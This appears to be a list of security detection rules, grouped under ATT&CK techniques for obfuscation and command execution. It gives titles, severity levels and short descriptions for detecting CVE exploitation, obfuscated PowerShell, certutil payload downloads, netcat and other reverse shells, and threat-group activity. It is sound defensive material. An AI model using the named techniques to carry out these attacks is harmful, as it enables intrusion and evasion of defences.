  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE - Level: medium
    Description: Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
  • CVE-2022-31659 VMware Workspace ONE Access RCE - Level: medium
    Description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass - Level: high
    Description: Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
  • Apache Spark Shell Command Injection - Weblogs - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
  • Atlassian Bitbucket Command Injection Via Archive API - Level: high
    Description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
  • Potential OWASSRF Exploitation Attempt - Proxy - Level: high
    Description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
  • OWASSRF Exploitation Attempt Using Public POC - Proxy - Level: critical
    Description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
  • Potential OWASSRF Exploitation Attempt - Webserver - Level: high
    Description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint
  • OWASSRF Exploitation Attempt Using Public POC - Webserver - Level: critical
    Description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 - Level: high
    Description: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • Potential CVE-2023-2283 Exploitation - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.
  • Potential CVE-2023-23752 Exploitation Attempt - Level: high
    Description: Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla
  • Potential CVE-2023-25717 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin
  • Potential CVE-2023-27997 Exploitation Indicators - Level: medium
    Description: Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity - Level: high
    Description: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
  • CVE-2023-46747 Exploitation Activity - Proxy - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-46747 Exploitation Activity - Webserver - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE - Level: high
    Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
  • CVE-2024-50623 Exploitation Attempt - Cleo - Level: high
    Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.
  • Multiple Suspicious Resp Codes Caused by Single Client - Level: medium
    Description: Detects possible exploitation activity or bugs in a web application
attack.t1027 110
Show Rules (110)
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Base64 Encoded Listing of Shadowcopy - Level: high
    Description: Detects base64 encoded listing Win32_Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets - Level: high
    Description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
  • Potential PowerShell Base64 Encoded Shellcode - Level: medium
    Description: Detects potential powershell Base64 encoded Shellcode
  • Potential Xor Encoded PowerShell Command - Level: medium
    Description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection
  • New Service Uses Double Ampersand in Path - Level: high
    Description: Detects a service installation that uses a suspicious double ampersand used in the image path value
  • Decode Base64 Encoded Text - Level: low
    Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
  • Decode Base64 Encoded Text -MacOs - Level: low
    Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
  • Invoke-Obfuscation CLIP+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
  • Invoke-Obfuscation STDIN+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Security - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Security - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Security - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Security - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Password Protected ZIP File Opened - Level: medium
    Description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
  • Password Protected ZIP File Opened (Suspicious Filenames) - Level: high
    Description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
  • Password Protected ZIP File Opened (Email Attachment) - Level: high
    Description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
  • Invoke-Obfuscation CLIP+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - System - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
  • Invoke-Obfuscation STDIN+ Launcher - System - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation Via Stdin - System - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation RUNDLL LAUNCHER - System - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Clip - System - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - System - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - System - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Potential Winnti Dropper Activity - Level: high
    Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
  • Suspicious Get-Variable.exe Creation - Level: high
    Description: Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Clip - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
  • Invoke-Obfuscation STDIN+ Launcher - Powershell - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Powershell - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Powershell - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Potential PowerShell Obfuscation Using Character Join - Level: low
    Description: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
  • Potential PowerShell Obfuscation Using Alias Cmdlets - Level: low
    Description: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
  • File Decoded From Base64/Hex Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
  • Suspicious Download Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with certain flags that allow the utility to download files.
  • Suspicious File Downloaded From Direct IP Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
  • File Encoded To Base64 Via Certutil.EXE - Level: medium
    Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
  • Suspicious File Encoded To Base64 Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE - Level: high
    Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
  • Certificate Exported Via Certutil.EXE - Level: medium
    Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Ping Hex IP - Level: high
    Description: Detects a ping command that uses a hex encoded IP address
  • PowerShell Base64 Encoded Invoke Keyword - Level: high
    Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
  • PowerShell Base64 Encoded Reflective Assembly Load - Level: high
    Description: Detects base64 encoded .NET reflective loading of Assembly
  • Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call - Level: high
    Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
  • PowerShell Base64 Encoded WMI Classes - Level: high
    Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
  • Potential PowerShell Obfuscation Via Reversed Commands - Level: high
    Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine - Level: medium
    Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
  • Potential PowerShell Command Line Obfuscation - Level: high
    Description: Detects the PowerShell command lines with special characters
  • Potential Encoded PowerShell Patterns In CommandLine - Level: low
    Description: Detects specific combinations of encoding methods in PowerShell via the commandline
  • Base64 Encoded PowerShell Command Detected - Level: high
    Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
  • Potential PowerShell Obfuscation Via WCHAR - Level: high
    Description: Detects suspicious encoded character syntax often used for defense evasion
  • Suspicious XOR Encoded PowerShell Command - Level: medium
    Description: Detects presence of a potentially xor encoded powershell command
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
  • Renamed AutoIt Execution - Level: high
    Description: Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
  • Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image - Level: high
    Description: Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
  • Suspicious SYSTEM User Process Creation - Level: high
    Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • Potential Emotet Activity - Level: high
    Description: Detects all Emotet like process executions that are not covered by the more generic rules
  • Operation Wocao Activity - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Operation Wocao Activity - Security - Level: high
    Description: Detects activity mentioned in Operation Wocao report
  • Potential CommandLine Obfuscation Using Unicode Characters - Level: medium
    Description: Detects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
  • Potential Suspicious Execution From GUID Like Folder Names - Level: low
    Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
  • Invoke-Obfuscation CLIP+ Launcher - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block)
  • Invoke-Obfuscation STDIN+ Launcher - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
attack.t1059 95
Show Rules (95)
  • Lazarus Loaders - Level: critical
    Description: Detects different loaders as described in various threat reports on Lazarus group activity
  • Execution via MSSQL Xp_cmdshell Stored Procedure - Level: high
    Description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
  • Wscript Execution from Non C Drive - Level: medium
    Description: Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.
  • Lateral Movement Indicator ConDrv - Level: low
    Description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context.
  • Azure New CloudShell Created - Level: medium
    Description: Identifies when a new cloudshell is created inside of Azure portal.
  • BPFDoor Abnormal Process ID or Lock File Accessed - Level: high
    Description: detects BPFDoor .lock and .pid files access in temporary file storage facility
  • Suspicious Invocation of Shell via AWK - Linux - Level: high
    Description: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
  • Capsh Shell Invocation - Linux - Level: high
    Description: Detects the use of the "capsh" utility to invoke a shell.
  • Atlassian Confluence CVE-2022-26134 - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
  • Shell Invocation via Env Command - Linux - Level: high
    Description: Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
  • Shell Execution via Git - Linux - Level: high
    Description: Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Potential Netcat Reverse Shell Execution - Level: high
    Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
  • Python Spawning Pretty TTY Via PTY Module - Level: medium
    Description: Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
  • Inline Python Execution - Spawn Shell Via OS System Library - Level: high
    Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
  • Shell Execution via Rsync - Linux - Level: high
    Description: Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Suspicious Invocation of Shell via Rsync - Level: high
    Description: Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
  • Shell Invocation Via Ssh - Linux - Level: high
    Description: Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
  • Suspicious Java Children Processes - Level: high
    Description: Detects java process spawning suspicious children
  • Potential Xterm Reverse Shell - Level: medium
    Description: Detects usage of "xterm" as a potential reverse shell tunnel
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • Payload Decoded and Decrypted via Built-in Utilities - Level: medium
    Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
  • Suspicious Browser Child Process - MacOS - Level: medium
    Description: Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Hacktool Ruler - Level: high
    Description: This events that are generated when using the hacktool Ruler by Sensepost
  • Windows Defender AMSI Trigger Detected - Level: high
    Description: Detects triggering of AMSI by Windows Defender.
  • Windows Defender Threat Detected - Level: high
    Description: Detects actions taken by Windows Defender malware detection engines
  • PCRE.NET Package Temp Files - Level: high
    Description: Detects processes creating temp files related to PCRE.NET package
  • Suspicious File Created In PerfLogs - Level: medium
    Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
  • Windows Shell/Scripting Application File Write to Suspicious Folder - Level: high
    Description: Detects Windows shells and scripting applications that write files to suspicious folders
  • PCRE.NET Package Image Load - Level: high
    Description: Detects processes loading modules related to PCRE.NET package
  • Abusable DLL Potential Sideloading From Suspicious Location - Level: high
    Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
  • Windows Defender Exclusions Added - PowerShell - Level: medium
    Description: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
  • Potential Dosfuscation Activity - Level: medium
    Description: Detects possible payload obfuscation via the commandline
  • Unusual Parent Process For Cmd.EXE - Level: medium
    Description: Detects suspicious parent process for cmd.exe
  • Conhost Spawned By Uncommon Parent Process - Level: medium
    Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
  • Forfiles Command Execution - Level: medium
    Description: Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.
  • Use of FSharp Interpreters - Level: medium
    Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" Both can be used for AWL bypass and to execute F# code via scripts or inline.
  • Fsutil Behavior Set SymlinkEvaluation - Level: medium
    Description: A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
  • Potential Arbitrary Command Execution Via FTP.EXE - Level: medium
    Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
  • Potential CobaltStrike Process Patterns - Level: high
    Description: Detects potential process patterns related to Cobalt Strike beacon activity
  • HackTool - Sliver C2 Implant Activity Pattern - Level: critical
    Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
  • HackTool - Stracciatella Execution - Level: high
    Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
  • Use of OpenConsole - Level: medium
    Description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting
  • Use of Pcalua For Execution - Level: medium
    Description: Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.
  • Suspicious Runscripthelper.exe - Level: medium
    Description: Detects execution of powershell scripts via Runscripthelper.exe
  • Wscript Shell Run In CommandLine - Level: medium
    Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Level: high
    Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
  • Suspicious Remote Child Process From Outlook - Level: high
    Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
  • Perl Inline Command Execution - Level: medium
    Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
  • Php Inline Command Execution - Level: medium
    Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
  • PowerShell Download and Execution Cradles - Level: high
    Description: Detects PowerShell download and execution cradles.
  • Run PowerShell Script from Redirected Input Stream - Level: high
    Description: Detects PowerShell script execution via input stream redirect
